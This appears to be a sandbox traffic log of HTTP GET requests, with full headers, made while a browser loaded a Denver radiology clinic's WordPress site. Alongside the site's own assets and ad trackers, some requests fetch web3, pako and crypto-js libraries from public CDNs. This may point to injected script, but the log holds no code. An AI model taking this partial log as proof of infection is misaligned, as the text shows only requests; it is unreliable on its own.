Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/css/autoptimize_single_bd8588e4b0c0a35837f09d5678d2471c.css HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/css/autoptimize_single_31fd6832d3761047ca9f7a21924839af.css HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/css/autoptimize_single_dd440d21fcdf5f5f900dde931d0c3d24.css HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/css/autoptimize_single_670c6b26a458600251838ce65c0c44a2.css HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/milo/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1Host: mipscenter.comConnection: keep-aliveOrigin: https://mipscenter.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/03/new-website-logo-360x98.png HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/02/new-obl-pic-1536x619.jpg HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/02/pelvic-pain.jpg HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/02/dvt-and-vein.jpg HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/02/108-1536x922.png HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_a9b8772172f95ce2efaf68dfd58e4152.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/03/new-website-logo-360x98.png HTTP/1.1Host: mipscenter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /companies/373196729/wp-0-5-3/swap.js HTTP/1.1Host: cdn.callrail.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /traffic-assets/js/tccl-tti.min.js HTTP/1.1Host: img1.wsimg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/web3@latest/dist/web3.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/pako/2.0.4/pako.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_fb0c7bc7a6d9f663a06090c047a9fb61.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/02/pelvic-pain.jpg HTTP/1.1Host: mipscenter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_36a0c64573c39884cdd5b91f8dc1cdf0.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/02/109-1-1536x922.png HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/99-1536x922.jpg HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/02/dvt-and-vein.jpg HTTP/1.1Host: mipscenter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/crypto-js@4.1.1/crypto-js.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/02/new-obl-pic-1536x619.jpg HTTP/1.1Host: mipscenter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/js/clients/tti/tti.min.js HTTP/1.1Host: img1.wsimg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_23443f3486906cc9bc9afb0133ddc022.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_39665ee2dc57bef3021cf6babd84a7c6.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_252a7a5bbb2e3dd12f13c550625cc8ba.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_4bad469c4113485f1a84ece2da345aa8.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_3e41bfa32dc3e7aa84064d9e9d0969b3.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /td/rul/11060750287?random=1743111905938&cv=11&fst=1743111905938&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be53q1za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=102482433~102522474~102788824~102803279~102813109~102887800~102926062&u_w=1280&u_h=1024&url=https%3A%2F%2Fmipscenter.com%2F&hn=www.googleadservices.com&frm=0&tiba=Interventional%20Radiology%20in%20Denver%2C%20CO%20%7C%20MIPS%20Center&npa=0&pscdl=noapi&auid=1553177151.1743111906&fledge=1&data=event%3Dgtag.config HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLf3ygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/mypractis/modules/practis-wysiwyg-icons/js/animation-listeners.min.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/02/108-1536x922.png HTTP/1.1Host: mipscenter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/11060750287/?random=1743111905938&cv=11&fst=1743111905938&bg=ffffff&guid=ON&async=1&gtm=45be53q1za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=102482433~102522474~102788824~102803279~102813109~102887800~102926062&u_w=1280&u_h=1024&url=https%3A%2F%2Fmipscenter.com%2F&hn=www.googleadservices.com&frm=0&tiba=Interventional%20Radiology%20in%20Denver%2C%20CO%20%7C%20MIPS%20Center&npa=0&pscdl=noapi&auid=1553177151.1743111906&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_f92b60460a40c563830b73c3b5f644e0.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_d38ecc48a4303501a23f4b3518c189ce.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/02/109-1-1536x922.png HTTP/1.1Host: mipscenter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/js/autoptimize_single_7bef6ce7a551419eda56949734c4e27c.js HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906
